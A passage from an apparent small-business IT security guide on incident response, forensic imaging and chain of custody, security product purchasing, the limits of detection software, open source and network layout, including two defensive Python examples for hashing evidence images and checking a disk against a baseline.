properly and make sure that the threat is completely removed. Anti-virus programs will try to remove a
detected infection, but the truth is that they are not often successful. A virus may very well make changes or
install software that the anti-virus cannot detect or cannot safely undo. Similarly, a hacker having broken
into a web server can hide changes in many subtle places which might provide a means of reentry. A
complete reinstall is safe, thorough, and may even be faster than attempting repairs. The heavy handed
approach, however, means that you must budget for some spare hardware and make sure that documents
are backed up regularly, both of which will protect you from other kinds of incidents as well. Remember
that replacement hardware is temporary and need not be as fast or fancy as the original system.

Tip
Act quickly and decisively: A PC can always be restored to a network and accounts reenabled
after they are shown to be safe. You will not be able to recover confidential data that has been
copied to somewhere beyond your control.

The heavy-handed approach should also be taken with possibly compromised accounts. If you have
reason to believe that an account has been compromised or has been used for unauthorized access to
data, lock it, and seriously consider locking all accounts used by the same person until you can interview
the employee, scan their PC, laptop, etc., for malware, and change their passwords or credentials. Over-
zealousness should not be a problem as long as everything you do is reversible, your investigative process
is streamlined, and you keep people informed of what actions are being taken and why.

Once a compromised system has been isolated, data should be gathered for later examination. Some of this
can be gathered from the live machine with computer forensics software or hardware to examine memory.
In particular, you can record which programs are running and where they attempt to connect. Live forensics
programs have serious limitations, however, and can be hoodwinked by infections which have gained deep
control over the operating system [Higgins-2007]. Any relevant network or other access logs should also
be copied and stored along with applicable physical security information such as check-in/check-out times
and CCTV footage if local access is suspected.

Almost immediately, a copy of the hard-drive should be made (an image). In fact, it is best to make two, one
to preserve untouched for law enforcement (if applicable) and one to actively examine. Then the hard drive
can be wiped clean, reinstalled, and put back to use. One attraction of virtual machine (VM) technology
is that the “hard drive” the operating system is running on is not real, but is in fact a drive image stored in
a file. That image can be copied or reset to an earlier (and safe) state quickly and easily making cleanup
from break-ins fast and efficient.

When gathering evidence, be careful to keep a documented chain of custody; record who handles each
piece and what tests are run. Print and store output of all procedures. If at all possible, ensure that all actions
have an additional witness present. Your legal counsel will likely have additional advice for preparing
evidence which can be used by law enforcement.
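An added example (my own, not from the original document) of the imaging and chain-of-custody steps above: it hashes a constructed "drive" file, makes an evidence copy and a working copy, verifies both against the original hash, and appends each action with handler and witness to an append-only custody log that can later prove the evidence copy is untouched. The handler and witness names are placeholders, and a real drive would be imaged through a write-blocker with a forensic imaging tool rather than a file copy; the verification and logging logic is the part that carries over.

```python
"""Added example: two verified copies of a drive image plus a custody log.

The 'drive' is a constructed file; handler and witness names are placeholders."""
import hashlib
import json
import os
import shutil
import tempfile
from datetime import datetime, timezone


def sha256_of(path):
    """Hash a file in chunks so large images do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def log_custody(logfile, handler, action, item, digest, witness):
    """Append one record to the custody log (JSON lines, append-only)."""
    record = {"time": datetime.now(timezone.utc).isoformat(),
              "handler": handler, "witness": witness,
              "action": action, "item": item, "sha256": digest}
    with open(logfile, "a") as f:
        f.write(json.dumps(record) + "\n")
    return record


def image_and_verify(source, workdir, handler, witness):
    """Copy source twice (evidence copy, working copy); verify each by hash."""
    logfile = os.path.join(workdir, "custody.log")
    original = sha256_of(source)
    log_custody(logfile, handler, "hash-source", source, original, witness)
    copies = {}
    for name in ("evidence.img", "working.img"):
        dest = os.path.join(workdir, name)
        shutil.copyfile(source, dest)
        digest = sha256_of(dest)
        if digest != original:
            raise RuntimeError("copy %s does not match the source hash" % name)
        log_custody(logfile, handler, "image", dest, digest, witness)
        copies[name] = digest
    # The evidence copy is never examined directly; make it read-only.
    os.chmod(os.path.join(workdir, "evidence.img"), 0o444)
    return original, copies, logfile


def verify_untouched(path, recorded_digest):
    """Later check that a preserved copy still matches its logged hash."""
    return sha256_of(path) == recorded_digest


def demo():
    """Run the procedure on a constructed 'drive' in a temporary directory."""
    workdir = tempfile.mkdtemp()
    source = os.path.join(workdir, "seized-drive.bin")
    with open(source, "wb") as f:
        f.write(b"constructed disk contents " * 4096)
    original, copies, logfile = image_and_verify(
        source, workdir, "J. Doe (placeholder)", "S. Roe (placeholder)")
    with open(logfile) as f:
        entries = [json.loads(line) for line in f]
    return {"original": original, "copies": copies, "entries": entries,
            "evidence_path": os.path.join(workdir, "evidence.img")}


if __name__ == "__main__":
    result = demo()
    for e in result["entries"]:
        print(e["time"], e["handler"], e["action"], e["sha256"][:16] + "...")
```

Printing the log and having the witness initial it gives you the paper record the text asks for; the hash recorded at imaging time is what lets anyone re-run verify_untouched() months later and show the evidence copy has not changed.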

Throughout this process, be careful with communication about the incident. Ensure that team members
verify the identity of who they are communicating with (employees, IT staff, vendors, authorities, etc.)
and protect the privacy of the communication. Impersonation to obtain security information is common.
Information leaks can start rumors and undermine the handling of an incident before an investigation can
be completed. They may also inform an attacker of the progress of an investigation. The CSIRT should
control the release of information to ensure that it is accurate, complete, and does not compromise security.
[BrownleeGuttman-1998 pp 5-6, West-BrownEtAl-2003 pp 106-110]

After the initial stages, incident response can take any of several directions, depending on what was
compromised, how it was compromised, and whether it can reasonably be expected to happen again. This
is where clear policy and clearly defined responsibilities are critical, and their exact form depends on the
size and type of business you run. Your overall goal, however, will be the same: comply with all regulations
and privacy rules to resolve the incident and prevent recurrence with as little disruption as possible. The
CSIRT is not there to play policeman unless there is something to be gained. What you do next will
depend on some of the following questions:

Follow-up Questions
• How did the incident occur? Is this incident related to other incidents?

• What permanent changes need to be made to prevent recurrence? Is it covered by a support agreement
or contract? Is this a technological or a policy problem?

• How was the problem discovered? Could it have been discovered sooner? Should a warning or advisory
be issued?

• Was the incident a result of a broken policy or agreement? Does action need to be taken?

• Is there enough evidence to involve a third party such as a security organization or law enforcement and
pursue the criminal?

• Was, in fact, confidential data compromised? Could it have been copied somewhere outside of business
control? Can the thief potentially read/use the data, or is it strongly encrypted?

• If data was compromised, who does it belong to? What other parties must we inform to comply
with regulations and contractual obligations (e.g. customers, credit card companies, vendors with
confidentiality agreements, etc.). Do we have contractual liabilities?

• If our data was compromised or destroyed, what can we do to mitigate the loss? Is a loss covered under
an insurance policy?

• Were sensitive records modified or destroyed (billing records, account information, contracts, access
logs, employee records, etc)? What can we do to identify fraudulent records and restore them? Is our
backup and recovery system working?

• Was our system used to attack other systems (such as visitors to our web site)? Did these attacks succeed?
Who do we need to inform?

• Do we need to make a public statement or control negative publicity?

The answers to these questions should result in a list of action items to be passed on to other parts of the
company, such as IT changes, policy updates, legal actions, press releases, and so forth as necessary. In
a small company, of course, these actions will be handled mostly by the same people wearing different
hats. The team should also produce a clear and concise report of the incident and a summary of the actions
taken for the record.

A heavy-handed approach is appropriate early on, but the response should be more reasoned as the incident
is investigated. In particular, be careful to differentiate between a possible inside job, a violation of policy,
and simple human error. If management is too quick to hand out blame, fewer incidents will be reported
in the future.

Each set of regulations you must comply with will have its own slightly different set of definitions for what
constitutes a compromise, when, and whom you must inform. As an example, regulations may only care
about incidents in which certain combinations of data are released, such as addresses and social security
numbers linked to first and last names (e.g. California SB 1386 [CaSenate-2003]). Either these details
must be codified in your own policy, or you simply need to have your policy refer to the relevant sections
of the regulations and go through them as needed. For serious breaches, you will need legal counsel to
help you navigate this minefield. As you go through the process, you will likely build up boilerplate letters
and forms to streamline many of the steps.

In addition to complying with regulations, you may need to coordinate with outside agencies such as other
CSIRTs to:

• Report software vulnerabilities.

• Obtain technical support.

• Help track or apprehend the criminal.

• Obtain more information about the attacker such as means of entry, whether data might have been stolen,
and what it might have been used for from other ongoing investigations.

• Warn others of attacks which may have been made from your network or infections passed on.

• Obtain outside review of proposed solutions.

In order for interoperation to work, you will need to give thought to confidentiality arrangements,
preferably beforehand. What information can you share with an outside agency? What confidential
information might need to be redacted from incident reports or logs? What limits on use of the information
do you need to communicate to the outside agency? You must also make sure you have prepared legitimate
points of contact with the most likely outside agencies so you can maintain the privacy and integrity
of the communications [BrownleeGuttman-1998 pp 5-6, 11-14, SeiCm-2001, West-BrownEtAl-2003 pp
112-115].

At the end of the process, one last set of questions should be asked:

Post-Mortem
• What is the approximate cost of this incident?

• Were the actions taken timely and appropriate? Could the response have been improved?

• Did the Incident Response Plan work? Are the roles and responsibilities appropriate? Does the plan
need adjustment?

• Did the CSIRT have the resources needed to do its job efficiently? What might make the job easier?

A brief treatment of these questions, perhaps directly including comments by team members or employees
involved in the incident, should go in an after-action report to be filed with the incident and be considered
in future responses.

Tip
The US-CERT Vulnerability Database [11] is a good source for information on current threats. There
is a mailing list available for daily announcements. You should also check regularly with your
software and security vendors for problems and fixes.

[11] http://www.kb.cert.org/vuls/

In addition to clean-up after incidents occur, the CSIRT in most organizations is also responsible
for tracking developing threats by monitoring announcements of security agencies, vendors, and peer
organizations, informing IT staff, and drafting warnings or advisories for distribution to employees,
customers, and other stakeholders.

Making IT and Security Purchases


Avoiding the Lemons
When I was younger, I went on a mission with my dad to buy a used car. We took my uncle along, who
owned a repair business, and took a look at several “deals”. I remember one in particular, a blue Ford
sedan of some description with low mileage and a decent price. My father talked to the salesman while
my uncle poked around the car. The salesman was expounding the virtues of the vehicle when he noticed
what my uncle was doing. “Is he a body man?” the seller asked. “Yep.” my dad answered. The salesman
immediately gave up the pitch. Many years later, I think back to that car when making purchase decisions.

Aside from sound policies, security awareness and training, threat tracking, one aspect of proactive security
is sound IT purchasing and deployment. This is not an easy subject and there is no magic formula,
especially when a business is bound by legacy systems and a need for compatibility with customers,
vendors, and government agencies. There are many snake-oil salesmen. Common products are released to
market much too soon and, as a consequence, rife with vulnerabilities.

The problem can be illustrated by the Secustick™, a password-protected USB memory stick which is
supposed to erase itself after several failed access attempts. The device was used by many organizations
for sensitive data—until it was demonstrated that its security was simplistic and could be broken with
minimal time and effort [Tweakers-2007]. In his column Security Matters, noted security expert Bruce Schneier
discusses this device, the generally poor quality of security technology, and the difficulty IT customers
have in separating the wheat from the chaff, comparing the industry to the used car market.

In general, he says, in any industry where the seller knows more about the product than the buyer, good
products are undercut and people tend to buy lemons:

Take the market for encrypted USB memory sticks. Several companies make encrypted
USB drives— Kingston Technology sent me one in the mail a few days ago— but even
I couldn't tell you if Kingston's offering is better than Secustick. Or if it's better than any
other encrypted USB drives. They use the same encryption algorithms. They make the
same security claims. And if I can't tell the difference, most consumers won't be able
to either.
—[Schneier-2007]

In this section, I try to improve your chances of “getting it right,” but in general:

• Don't lock heads with technology zealots; different technologies, different approaches, have their place.

• If it ain't broke, don't fix it; do not rush to embrace brand new technology.

• Use a defense in depth; do not bet everything on one product.

• Consider product failure in your risk analysis; what happens if you need to switch vendors or downgrade
due to an intractable problem?

I will mainly focus on security-specific software, but much of the discussion will apply to products
containing security features and IT decisions generally.

Simple, Proven, Standard

What's In a “Standard”?

There is a lot of confusion between the words standard, de-facto standard, open, and open source.
These terms are discussed individually in the glossary, but we will discuss them in relation to IT
purchases here.

Standards are published specifications which anyone can examine. Open standards are maintained
by some form of group consensus and licensed so that anyone, even direct competitors of the
publisher or submitter, can comment on them or use them. A standard provides the benefits of peer
review and interoperability: a potential user can depend on the process to provide some guarantee
that compliant products meet some level of quality and function the same as other compliant
products. Interoperability allows the user an out if a product they depend on turns out to not meet
their needs due to quality, legal concerns, security, scalability, or cost. De-facto standards, products
or practices in common use throughout the industry but not specifically defined, do not give the
customer any of the benefits of an open standard and may lead to vendor lock-in.

Specifications which are encumbered by intellectual property licenses, non-compete agreements, or
non-disclosure agreements are not “standards” for our purposes here, since they do not benefit from
peer review or interoperability. To be useful, a standard must allow and encourage open competition.

Open source products, products whose source code is publicly available and group maintained,
have the aspects of peer review and group control, but are not themselves “standards” and may or
may not interoperate with other products. Many open source products, however, are also standards
compliant. For instance, the popular Apache Web Server implements the Hypertext Transfer
Protocol (HTTP) and the Common Gateway Interface (CGI) standards, among others, and does
essentially the same job as any other web server. Linux™ closely follows the UNIX™ operating
system standards, and Linux applications can easily run on other UNIX systems such as Sun
Solaris™ or Apple's OS X™.

Standards, like any process involving humans, are not perfect. In the groups I have been involved
with, hundreds of emails can sometimes be spent arguing over details which eventually get
tabled and left ambiguous in the specification because no one can agree on a single approach.
Industry guidelines or recommendations fill gaps until the standard catches up and, in the
meantime, customers experience incompatibilities and headaches. In the end, however, standards
help customers get what they want and know what they are getting.

Generally, people are concerned about three aspects of security technology: cost, functionality, and
effectiveness. Only two of those can be effectively judged by most consumers. Cost, or at least price, is
an easy item to judge. Functionality is a little tougher, particularly if you are unwilling to take vendor claims
at face value. Fortunately, it is relatively easy to find press reviews for many products which will describe basic
features and ease of use. Ease of use impacts Total Cost of Ownership (TCO) by affecting support and
training costs. Ease of use also impacts effectiveness to the extent that a product which is difficult to use
or understand will probably not be used properly. Reviews of product effectiveness, especially competent
ones, are much harder to find. Press reports stick to features and price in reviews because they require
less expertise to write, do not require expensive labs, are faster to market, and do not lose the reader in
the first paragraph.

Not only is the effectiveness of a security product hard to judge, it is also hard to get right. Security
requires expertise, a disciplined process, and rigorous testing, all of which are expensive. Leaning on
established, standard technology helps, but even when using a standard (an encryption algorithm, for
instance), the vendor must make sure that their implementation of the standard is correct and nothing in the
product around it undermines the security. Independent certification raises costs even further. If a product
is competing on price, features, and effectiveness, an effective product must sacrifice somewhere, and
features are a good place to cut since a simpler product is also easier to test.

A corollary here is that a product which is priced well and has an array of features is probably not well
tested—the books have to balance. Many commodity software and hardware products are released well
before they are ready and are tested by consumers, with a steady stream of bug-fixes, security patches,
and driver updates. A disturbing trend is the number of such products, especially short-lived consumer
hardware, where the vendor does not even bother to fix the software problems, expecting the consumer to
just upgrade to the newest hardware. I have several such paperweights on my desk right now.

The prudent shopper, therefore, looks for the simplest products that will do the required job. Remember
that simple components working together make up a defense in depth (see the section called “Create a
Defense In Depth”). In many cases, you will find that the extra features are not needed and may just make
products harder to use and understand. Other than reading like something out of Mission Impossible, there
is no real advantage to a self-destructing memory stick versus one which merely uses strong encryption.
A self-destructing drive protects the data if the wrong password is entered; an encrypted drive, by being
simpler, also protects the data if the drive is taken apart.

Products which include security features like built-in encryption have historically been very weak (e.g.
zip-file or Word document encryption). Many times these features are an afterthought and are not given as
much attention as the rest of the system. The vendor may not even have the in-house expertise to do the job
right. It is therefore better to get simpler applications and use dedicated external tools to provide security.
This also offers the option of changing those tools if you find that they do not suit your needs. On the other
hand, integrated security features are easy and convenient; it is much easier to check a box saying “encrypt
this” than to remember to run an extra program. The best of both worlds may be applications which provide
a framework for 3rd party plugins so that the “encrypt this” checkbox runs the tool of your choice. As an
example, Firefox does not have built-in anti-phishing protection, but I know of at least three Firefox add-
ons which do and have chosen one I find useful. I also use a 3rd party plugin to provide encryption in
the Macintosh Mail application I use. The applications and plugins remain simple and dedicated to their
tasks while retaining convenience.

Look for products that have been audited by independent labs, have in-depth security reviews, or have feedback
from security professionals. This will necessarily steer you away from the newest whiz-bang technology and
toward the cars that have a good track record and high resale value. It is often better to let others blaze
the trail and simply learn from their mistakes.

Take statistics-based security reviews with a spoonful of salt (“X product had 79 vulnerabilities last year,
while Y product had 32. Y is more secure.”). Statistics can be twisted to serve almost any purpose and that
class of report is often highly slanted: How serious were the reported problems? How many were actually
exploited? Were the problems self-reported or independently found? Do the numbers include bundled
software? How fast were serious versus minor problems fixed? What counts as a separate vulnerability?
etc. These reports can provide useful insights, but, unless you have time to check all of the underlying
assumptions, be wary of them.

Favor products that implement or use standards compliant technology. From a security standpoint alone,
this yields several advantages: peer review, group control, interoperability. I have harped on peer review
quite a bit. Group control gives the business a chance to participate in the process (if necessary or desired),
and protects the competition needed to make interoperability meaningful. Interoperability is critical from
two directions.

First, interoperability allows customers to switch tracks if one product or technology fails to meet their
needs. If a database system is found to be insecure and cannot (or will not) be fixed, you must be able to
get your data out of it and into another product. You must also, with as little disruption as possible, get
a new database product to fit into your IT structure, such as an online ordering system. If a customer has
no real ability to do this, then a vendor has no pressing need to test their product, offer timely support,
compete over price, or virtually anything else.

With a de-facto standard, the definition of the technology is not written down and is only really understood
by the primary vendor. Whenever a competitor gets close to figuring out how it works, the vendor simply
makes slight changes in the technology in order to break competing products; while good for the vendor,
it is never good for the customer. Microsoft Word™ is the classic example of this kind of practice.

Second, without interoperability, a monoculture may develop. A monoculture is a situation where
everyone's defenses are identical to everyone else's, in this case because they are all running the same
software. An attack which works on one system works just as well on any other, and infections spread
very quickly—witness the Irish Potato Famine or the current situation with Internet worms. With
standards in place and marketplace competition, different businesses have somewhat different software.
The software is interoperable, but is unlikely to have the exact same problems. One of the reasons that
Linux systems, for instance, are not as vulnerable to attacks is because of different distributions (“flavors”)
of Linux. Linux systems are just different enough that an attacker must treat them individually rather than
launching fully automated attacks. This is not to suggest that every business can drop Windows and use
alternative systems (or even that this is entirely desirable), but it is food for thought: sometimes change is
good and sometimes just the clear threat of alternatives can force vendors into line.

One place where standards compliance is starting to change the nature of threats is with Internet browsing.
The increase in market share of non-Internet Explorer browsers (e.g. Firefox, Safari, Opera, etc.) is
encouraging web designers to make their pages work with more than one browser. Businesses are better
protected because Firefox users are immune to IE-specific threats and vice-versa. As the numbers continue
to change, attackers have to work harder to affect the same numbers of people and increased competition
is driving all of the web browsers to improve.

The Limits of Detection, Repair, and Forensics Software


This discussion deserves its own section because it concerns claims often made by product vendors and
generally misunderstood by customers. I touched on this issue in the section called “An Incident Response
Plan” when discussing forensics. There are clear limits to what malware detection, repair, and
forensics software (even hardware) can do. Specifically, once a system has been compromised, that is, once an
attacker has gained administrative access, then, by definition, you no longer control that system.

Caution
Once an attacker controls a system, no information from it and no operation on it, including the
functioning of any security software, can be entirely trusted, no matter how simple the problem
appears to be. The only safe course is to boot a safe copy of the operating system and system
files, preferably from unwritable media.

Essentially, administrative control of an operating system allows the attacker to change reality. They can
alter system files, device drivers, security settings, etc., limited only by their imagination. They can force
file browsers, virus scanners, or intrusion detection systems to see only what they are allowed to see. Sure,
in many cases, simple viruses will not go to these lengths, but attacks are becoming more sophisticated,
and it is quite possible for an attacker to offer up a red herring to a repair program while keeping the
real danger hidden. Recent discoveries have demonstrated ways to hide in “safe” parts of Windows Vista
designed to prevent users from copying copyrighted files (DRM). Ways have even been discovered to hide
from hardware-based memory scanners [Higgins-2007].

Network-based scanning and forensics software has even more difficulties, specifically software designed
to analyze a system to determine if it complies with security policies (anti-virus software, current OS
updates, etc.), and software used to remotely diagnose problems. These products can be actively dangerous
if they are allowed to generate a sense of complacency. This category of software relies on support from
the local machine. If the machine is hijacked, it is not difficult for the attacker to answer “Yes, I'm fine.” to
any question asked of it. It is like screening someone at an airport by asking, “Are you carrying a bomb?”

That is not to say that these categories of software are entirely useless, just that their use falls quite short
of their marketing descriptions. Further, their shortcomings are not due to flaws in their manufacturing;
they are fundamental to the nature of the tool. Network analysis tools can catch accidental mistakes, like
forgetting to update a machine or plugging a foreign laptop into the network. When they detect a problem,
such as an infection, the results can be depended on insofar as they show that some problem really exists. Tools can be set
up to automatically page administrators or quarantine dangerous PCs. They cannot be depended on to
correctly identify an infection, remotely repair a compromised system, or locate a clever attacker, and must
be backed up by regular direct examinations of the individual machines.

Part of the reason for their popularity is that a true remote solution to the problem would be a tremendous
time and money saver, allowing much greater centralization of support resources, earlier detection times,
and faster incident response. In practice, however, the solutions are just not workable.

Similarly, forensic tools run on the local machine can provide useful information as long as it is clearly
understood that the attacker is calling the shots and time can be dedicated to unravelling layers of deception.
On the other hand, most businesses can probably do just as well by making a safe copy of the disk and
leaving it to dedicated security experts with the tools, techniques, and expertise to perform that kind of
analysis. Meanwhile, wiping and reinstalling (despite its implications for downtime) is the safest repair
technique. Downtime can be reduced if a spare of a critical system can be set up and ready to go. Then you just
have to transfer data. Imaging and restoration software is also a great help. If you are restoring documents
that can contain macros or scripts to a system that was infected (e.g. Office documents), be sure to scan
them for viruses first or you may have to do it again.
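The point above, that the suspect machine's own software must never be asked to report on itself, can be made concrete with a small offline integrity check. This is an added example, not code from the original document: a baseline manifest of file hashes is taken while the system is known to be clean and stored on read-only media, and later the suspect disk is mounted from a clean boot and compared against it. The manifest format, the directory names, and the simulated tampering are constructed for this example.

```python
"""Offline integrity check of a suspect disk against a known-good baseline.

Added example (not part of the original document). The comparison is meant
to be run from a clean boot against the *mounted* suspect volume, with the
baseline taken earlier from the clean system and kept on unwritable media.
The manifest format ("sha256  relative/path" per line) is an assumption of
this example.
"""
import hashlib
import shutil
import tempfile
from pathlib import Path


def sha256_file(path: Path, chunk_size: int = 1 << 16) -> str:
    """Hash a file in chunks so large binaries need not fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict[str, str]:
    """Map every regular file under root (relative POSIX path) to its SHA-256.

    Run on the clean system (e.g. right after install) and store the result
    on read-only media; symlinks are skipped so only real content is hashed.
    """
    manifest = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and not path.is_symlink():
            manifest[path.relative_to(root).as_posix()] = sha256_file(path)
    return manifest


def dump_manifest(manifest: dict[str, str]) -> str:
    """Serialize the manifest, one 'digest  path' line per file."""
    return "".join(f"{digest}  {rel}\n" for rel, digest in sorted(manifest.items()))


def load_manifest(text: str) -> dict[str, str]:
    """Parse the manifest text; blank lines and '#' comments are ignored."""
    manifest = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, rel = line.split(None, 1)
        manifest[rel] = digest
    return manifest


def verify(root: Path, baseline: dict[str, str]) -> dict[str, list[str]]:
    """Compare the mounted suspect volume at root against the baseline.

    Returns sorted lists of files whose content changed, files on disk that
    the baseline never had (a dropped tool, for instance), and baseline files
    that are gone (a deleted log, for instance).
    """
    current = build_manifest(root)
    modified = [p for p in baseline if p in current and current[p] != baseline[p]]
    added = [p for p in current if p not in baseline]
    missing = [p for p in baseline if p not in current]
    return {"modified": sorted(modified), "added": sorted(added), "missing": sorted(missing)}


def demo() -> dict[str, list[str]]:
    """Constructed scenario: baseline a clean tree, tamper with it, verify."""
    work = Path(tempfile.mkdtemp(prefix="baseline-demo-"))
    try:
        volume = work / "suspect_volume"  # stands in for the mounted, not-booted disk
        (volume / "bin").mkdir(parents=True)
        (volume / "etc").mkdir()
        (volume / "bin" / "ls").write_bytes(b"clean ls binary")
        (volume / "etc" / "passwd").write_text("root:x:0:0::/root:/bin/sh\n")
        (volume / "etc" / "hosts").write_text("127.0.0.1 localhost\n")
        # In practice this text is what you would keep on read-only media.
        baseline_text = dump_manifest(build_manifest(volume))
        # Simulated compromise: replaced binary, extra file, removed file.
        (volume / "bin" / "ls").write_bytes(b"replaced ls binary")
        (volume / "etc" / "extra.conf").write_text("dropped\n")
        (volume / "etc" / "hosts").unlink()
        return verify(volume, load_manifest(baseline_text))
    finally:
        shutil.rmtree(work)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Because the hashing runs on the mounted disk rather than inside the suspect operating system, a compromised kernel or driver on that disk gets no say in what the check sees.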

Freeware versus Open Source


Here we discuss a bit about the differences between “Freeware” and open source software (which is
sometimes called “Free Software”). This can be confusing and has implications for security.

Freeware is often blamed for security problems, and rightly so. Freeware, as used here, includes a whole
host of downloadable gizmos, games, and gadgets which many computer users cannot resist. Some of
these programs are actually free and some of them start out free then request payment in some fashion
(after a time period, to access more features, to remove advertisements, etc: “shareware”). Many of these
programs are advertisement supported and are essentially the source of much adware, spyware, trojan
horses, and so forth. There are good and useful programs in the mix as well, but finding them takes some
detective work. Anti-spyware programs attempt to detect the bad apples but require constant updates to keep
up with new problems.

Open source, which has been called “Free Software” at times, is a very different beast. The Free Software
moniker has been explained as “Free as in Freedom, not Free as in beer”, referring to the ability to view
and share source code, but due to confusion with Freeware, open source has become the preferred term.
Open source is a type of software that is developed by a group effort, consisting of some mix of individuals,
companies, non-profit foundations, and government organizations. These groups contribute time, money,
equipment, and direction to the project in return for free access to the product. Open source products of
one sort or another underlie much of the structure of the Internet, such as the Domain Name Service (DNS)
backbone and most of the Internet's web and mail services. Commercial products are sometimes hybrids of open
and closed source: Apple's OS X runs on top of the free BSD UNIX operating system, LinkSys™ uses the
free Linux operating system in many of its consumer router products, as does Tivo™ in its personal video
recorder, and even Microsoft uses BSD code in its Windows networking stack.

Contrary to the claims of many opponents of open source (generally companies facing competition from open
source products), project development tends to be a very controlled process where changes are carefully approved
and anyone can view both the current state and the complete history at any time. This makes sneaking
in deliberate backdoors very difficult and often makes finding and removing security holes an easy
process. Contrary to the claims of many open source zealots, open source is not universally better. There are many
more open source products in existence than closed source, and many are of poor quality or have
languished because of lack of interest. In these cases, progress is slow and fixes to problems may not
happen. Sometimes commercial products are better designed because they benefit from a single point of
view instead of degenerating into arguments about different approaches. Open source often approaches
problems differently than common products and there can be a significant learning curve. In general,
however, open source processes do quite well for most purposes and the projects which survive are of very
high quality. The availability of source code drives competition for support contracts or customization.
Sometimes you will find that alternative products approach things differently because a different way is
actually safer and more efficient for some users.

In any case, I would seldom recommend that a company “take the plunge” unless there is a significant
business need, but slow incorporation of open source products, especially at the server level, can reduce
costs, open opportunities, and reduce vendor lock-in.

As an aside, I myself hated UNIX/Linux until one point in college where I forced myself to use it
exclusively for three weeks: writing papers, email, and so forth. Once I got an idea why the system worked
the way it did (there was no OpenOffice back then and UNIX was designed at a university level with an
emphasis on scientific and technical writing), it gave me a lot of insight into different ways to approach
even tasks as mundane as office work. Those insights still serve me today as I write a large technical
document on a system (Apple OS X) with UNIX underpinnings. Different tools for different jobs.

Your Network Layout


In this section, we describe common components of a business network and how they relate to security. If
you have a very small business and few computers, one component may do double duty and take the place
of several others; we will discuss this where appropriate. Figure 1, “Network Layout” shows common
network components.

Figure 1. Network Layout

Network Components

Internet. The Internet is often pictured as a cloud because the protocols it uses are designed to
not care about how they get from point A to point B. If you are in California sending data to New
York, it might go by way of Illinois, Texas, or anywhere in between. This makes the Internet highly
resilient in the face of network failures, but it also means you have little or no control over your data
once it leaves your own network. Encryption technologies, such as SSL in web browsers, help to
protect your data as it crosses the great unknown.
Internet Clients. Somewhere out there are PCs owned by your clients and customers which need
access to your services, such as your company website, online store, or real estate database. Some of
these PCs may have been compromised by viruses or hackers; some of them may be hackers. Your
challenge is to protect yourself and your users from fraud while still making your services easy and
convenient to use.
Internet Servers. Also out there in the cloud are the Internet services your business uses, such
as vendor websites, email from business partners, and so forth. Perhaps your own web site, email,
or other services are hosted on a third party server. As with customer PCs, 3rd party services may
be illegitimate or may have been taken over by the bad guys, so the benefit of outside services is
always balanced by some element of risk.
Router/Firewall. A router connects one network to another. A router is like the on/off ramp to a
highway. It connects a collection of local roads to a public expressway. Routers form the interchanges
and junctions which allow data to find its way across the world.

A large organization may have several routers connecting different sections of its network. A small
organization generally only has one, connecting its internal network, or Intranet, to the Internet. Most
routers designed to connect to the Internet contain security software to deny unwanted traffic and
protect the local network; this is called a firewall, or specifically, a hardware firewall. The firewall
is your first line of defence against the outside world. A firewall may be included in other consumer
network products such as DSL Modems and wireless access points, but products vary greatly in
sophistication and quality.
DMZ Servers. The DMZ or Demilitarized Zone is an area in between the internal network and
the outside world. The term refers to the land-mined stretch of land between North and South Korea.
The DMZ is a dangerous in-between space used to house the services, such as web sites and email,
your network provides to the Internet at large. Simple firewalls may only allow a single computer in
the DMZ, a DMZ Host, and provide no protection to it at all. Higher end firewalls support an entire
network of servers and can provide them with configurable protections from attack; note that PCI
DSS requires specific protections for DMZ servers [PciSsc-2006 § 1.3].
PCs. Of course, your network contains PCs, where your employees actually do their work.
Although your PCs are protected by a firewall (you do have a firewall, don't you?) from direct attack,
PCs are often used to connect to services on the Internet such as web pages and email and bring
things back with them, including viruses and the aptly named trojan horse programs. In addition,
PCs, in the hands of a shady employee, can be a source of attack themselves. Lastly, PCs, especially
laptops, can be stolen with all of their data.

PCs can also mount a battery of defensive software, including virus and spyware detectors, their own,
software-based, firewalls, layers of roles and permissions in the operating system, and document
encryption.
Intranet Services. Besides PCs, you probably have some servers, PCs, or devices that provide
services to the inside of your network, such as some shared files or maybe a printer. Consumer
products such as printers or hard drives that simply plug into a network have come a long way, so
even small shops may have network servers without even thinking of the computer inside. Larger
businesses may have shared databases and applications for payroll, accounting, claims processing,
etc. Protecting shared resources, especially those containing confidential data, is important. Many
networks also have some system for centralized storage of usernames and passwords, determining
who is allowed on the network and who is not.

Dialup or Remote Employees. Many businesses provide some way for employees to connect
to the business network from home or while on the road. Sometimes this is a convenience for
telecommuters, and sometimes it is a necessity for travelling sales staff or for on-call technical staff
who need to troubleshoot problems remotely. Sometimes this is dialup, Virtual Private Network
(VPN), or products like GotoMyPC™ [12]. Sometimes it happens without the company's knowledge.
At several large organizations where I have contracted, the IT staff found and removed illicit dialup
connections on a regular basis. GotoMyPC creeps into companies under the radar.

Remote connection can be a productivity boost, but it also presents problems because it allows a
potentially compromised employee PC to connect to the inside of your network and spread viruses,
not to mention that a virus-infected PC will probably report the employee's password to its controller.
Sneakernet. Toting disks back and forth, often affectionately called sneakernet, is another way for
data to get out of your business and for viruses to get in. Unfortunately, employees will often resort
to it if remote connections (e.g. dialup) are not allowed or other security restrictions are too tight.
Disks, USB drives, and whatnot are easily misplaced or stolen. USB drives with built-in encryption
can reduce the danger of lost or stolen devices.
Wireless Access Points. Wireless networking, Wi-Fi™ or Airport™ networks are a very
convenient way to link computers and peripherals like printers. No wiring has to be run and devices
can be freely moved around, which is especially convenient for laptops. On the other side, wireless
traffic can be snooped on and wireless networks can be broken into more easily than getting through
a firewall, so caution is in order [Lemos-2007b]. For laptops with wireless support (or Bluetooth®,
a similar technology for connecting keyboards, phones, and so forth) your computer can be hijacked
when you are in a public place, such as a cafe or hotel lounge, unless you protect yourself.

WEP, the encryption used in first-generation wireless networking equipment, has been cracked and is
essentially useless. You should (and may be required to) either upgrade old equipment to something
that supports WPA or WPA2, or rearrange your network so that it does not depend on the security
